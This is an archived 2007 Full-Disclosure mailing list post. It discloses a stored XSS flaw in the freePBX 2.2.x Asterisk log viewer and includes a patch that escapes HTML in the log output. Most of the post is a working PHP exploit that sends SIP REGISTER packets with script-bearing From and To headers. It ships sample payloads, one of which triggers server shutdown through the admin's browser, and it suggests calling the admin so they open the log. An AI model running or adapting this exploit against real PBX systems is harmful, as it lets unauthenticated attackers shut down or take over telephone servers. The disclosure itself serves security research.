lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-Id: <ECE533E0-BB6B-4346-8E9C-C54A664D56FA@phreaker.net>
Date: Thu, 19 Apr 2007 19:43:14 -0400
From: XenoMuta <xenomuta@...eaker.net>
To: full-disclosure@...ts.grok.org.uk
Subject: XSS in freePBX 2.2.x portal's Asterisk Log tool

#!/usr/bin/php
<?php
/*

       \  |      |   |           |                   |  _)
      |\/ |  _ \ __| __ \  |   | |\ \  /  _` | __ \  __| | __ \   _` |
      |   |  __/ |   | | | |   | | `  <  (   | |   | |   | |   | (   |
     _|  _|\___|\__|_| |_|\__, |_| _/\_\\__,_|_|  _|\__|_|_|  _|\__,_|
                      ____/
     ___ \  ___|   /                     Methylxantina 256mg
        ) | __ \   _ \  __ `__ \   _` |  http://xenomuta.blogspot.com
       __/    ) | (   | |   |   | (   |	
     _____|____/ \___/ _|  _|  _|\__, |  freePBX 2.2.x full-log XSS PoC
                                 |___/   by XenoMuta  
<xenomuta@...eaker.net>

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 
=-=-=-=-=-=														
ISSUE:
SIP protocol's fields such as From, To, Call-ID, User-Agent (and many  
others)
can carry html tags, wich are shown unfiltered by the Asterisk Log  
File tools
located at http://<freepbx root>/admin/modules/logfiles/asterisk-full- 
log.php
resulting in malicios HMTL or Javascript code injection.

IMPACT:
Server shutdown/restart, PBX control and Possible remote code  
execution through
amportal options. Just about anything you can code in Javascript.
* Note that the amportal's admin will only see the last 2000 lines of  
full log.
   for wich an attaker might call the admin asking for support at the  
time of
	exploitation.	This doesn't require	authentication or valid  
credentials >:)

WARNING:
* Do this on your own risk. Intended for research and educational  
purposes ONLY.
* Neither the author or Methylxantine 256mg are accountable for your  
actions.
* Running this will taint your log file. Make sure you clean it after  
a test.

FIX:
Here is a way to fix the problem.

[root@...erisk1 ~]# cd /var/www/html/admin/modules/logfiles
[root@...erisk1 logfiles]# cat<<EOF|patch
*** asterisk-full-log.php       2007-04-18 12:51:10.000000000 -0400
--- asterisk-full-log.php.fixed 2007-04-18 12:51:18.000000000 -0400
***************
*** 10,16 ****
   <hr>
   <br>
   <?
! echo system ('tail --line=2000 /var/log/asterisk/full | sed -e "s/$/ 
<br>/"');
   ?>

   </body>
--- 10,16 ----
   <hr>
   <br>
   <?
! echo system ('tail --line=2000 /var/log/asterisk/full | sed -e "s/</ 
\&lt;/;s/>/\&gt;/" | sed -e "s/$/<br>/"');
   ?>

   </body>
EOF


PAYOLA AND GREETS:
:)
gr33tz to:
- God, for being so faithfull.
- Lili, por la paciencia nocturna y por tu amor
- the Asterisk team and the freePBX team, for such an EXCELENT product
- EMRA, por la fragancia
- Leo, te di Luz


*/

print "\x1bc\n\x1b[1m\x1b[30m\x1b[47m";
print  
"                                                                        
        \n";
print  
"                                                                        
        \r";
print "      \\  |      |   |           |                   |   
_)            \n";
print  
"                                                                        
        \r";
print "     |\\/ |  _ \\ __| __ \\  |   | |\\ \\  /  _` | __ \\  __|  
| __ \\   _` |\n";
print  
"                                                                        
        \r";
print "     |   |  __/ |   | | | |   | | `  <  (   | |   | |   | |    
| (   |\n";
print  
"                                                                        
        \r";
print "    _|  _|\\___|\\__|_| |_|\\__, |_| _/\\_\\\\__,_|_|  _|\\__| 
_|_|  _|\\__,_|\n";
print  
"                                                                        
        \r";
print "                          
____/                                       \n";
print  
"                                                                        
        \r";
print "    ___ \\  ___|   /                     Methylxantina 256mg\n";
print  
"                                                                        
        \r";
print "       ) | __ \\   _ \\  __ `__ \\   _` |  http:// 
xenomuta.blogspot.com\n";
print  
"                                                                        
        \r";
print "      __/    ) | (   | |   |   | (   |	 \n";
print  
"                                                                        
        \r";
print "    _____|____/ \\___/ _|  _|  _|\\__, |  freePBX 2.2.x full- 
log XSS PoC\n";
print  
"                                                                        
        \r";
print "                                |___/   by XenoMuta  
<xenomuta@...eaker.net>\n";
print  
"                                                                        
        \n\x1b[0m";


//COMMENT ME TO PROCEED
//die("\x1b[31mWe urge you to read the code first. Comment this line  
to proceed.\n\x1b[0m");


if($argc<2) die("\nUsage: $argv[0] <sip proxy> [custom payload]\n\n");
$sipp=$argv[1];


if($argc<3){
//SOME SAMPLE PAYLOADS FOR YOUR PLEASURE

//Execute external Payload (this one only possible with Call-id payload)
$payload="<script>var body=document.getElementsByTagName('body');var  
fly= new Image(), ofly=new Image(), ifly=new Image();ifly.src='http:// 
xenmut.100webspace.net/fly2.png';ofly.src='http://xenmut. 
100webspace.net/fly1.png';ofly.onload=eval('var mv=setInterval(\'move 
()\',10);');fly.setAttribute 
('id','fly');fly.style.position='absolute;';fly.style.left='300';fly.sty 
le.top='100';body[0].appendChild(fly);var  
ang,s=2,xx,yy,cal,pi=3.1415926535,ala=true;function calma() 
{s=2;clearInterval(cal);}function move() {var x,y;x=(s*(Math.sin 
(ang)));y=(s*(Math.cos(ang)));ala=!ala;if(ala) fly.src=ifly.src;else  
fly.src=ofly.src;if(Math.round(100*Math.random())>96)ang+=ala?5:-5;if 
((xx+x>1024)||(xx+x<0)||(yy+y>800)||(yy+y<0)){ang=Math.round 
(360*Math.random());}else{xx+=x;yy+=y;}fly.style.left=xx 
+'px';fly.style.top=yy+'px';}function main(){ang=Math.round 
(360*Math.random());xx=620;yy=400;fly.onmouseover=function() 
{s=10;ang=Math.round(360*Math.random());clearInterval 
(cal);cal=setInterval('calma()',500);}}main();</script>";

//Space Invader (this one only possible with Call-id payload)
//$payload="<img width=900 src=http://www.i-marco.nl/weblog/images/ 
SpaceInvader.jpg>";

// Server shutdown Payload
/*
.oOOOo.     Oo    O       o oOoOOoOOo ooOoOOo  .oOOOo.  o.     O
.O     o    o  O   o       O     o        O    .O     o. Oo     o
o          O    o  O       o     o        o    O       o O O    O
o         oOooOoOo o       o     O        O    o       O O  o   o
o         o      O o       O     o        o    O       o O   o  O
O         O      o O       O     O        O    o       O o    O O
`o     .o o      O `o     Oo     O        O    `o     O' o     Oo
`OoooO'  O.     O  `OoooO'O     o'    ooOOoOo  `OoooO'  O     `o
*/
//$payload='<img src="../sysstatus/shutdown.php">';
} else {
$payload=$argv[2];
}

$ext=1234;
$agent="SJphone v1.0";
$udp=fsockopen("udp://$sipp",5060);
$seq=rand(10000,99900);
$packet = "REGISTER sip:$sipp SIP/2.0\n".
"Via: SIP/2.0/UDP $sipp:5060;rport;branch=z9hG4bK12345\n".
"From: $payload\n".
"To: $payload\n".
"Contact: \"$ext\" <sip:$ext@...pp:5060>\n".
"Call-ID: 12345@...pp\n".
"CSeq: 12345 REGISTER\n".
"Expires: 1800\n".
"Max-Forwards: 70\n".
"User-Agent: $agent\n".
"Content-Length: 0\n\n";
fputs($udp,$packet);
fclose($udp);
die("\nPAYLOAD SENT:\n$payload\n");

?>
Content of type "text/html" skipped

Download attachment "smime.p7s" of type "application/pkcs7-signature" (2425 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ